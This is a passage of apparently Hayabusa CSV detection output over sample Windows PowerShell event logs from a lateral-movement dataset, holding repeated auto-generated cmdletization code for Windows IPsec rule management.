$__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewP",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,", [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewP",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"olicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = 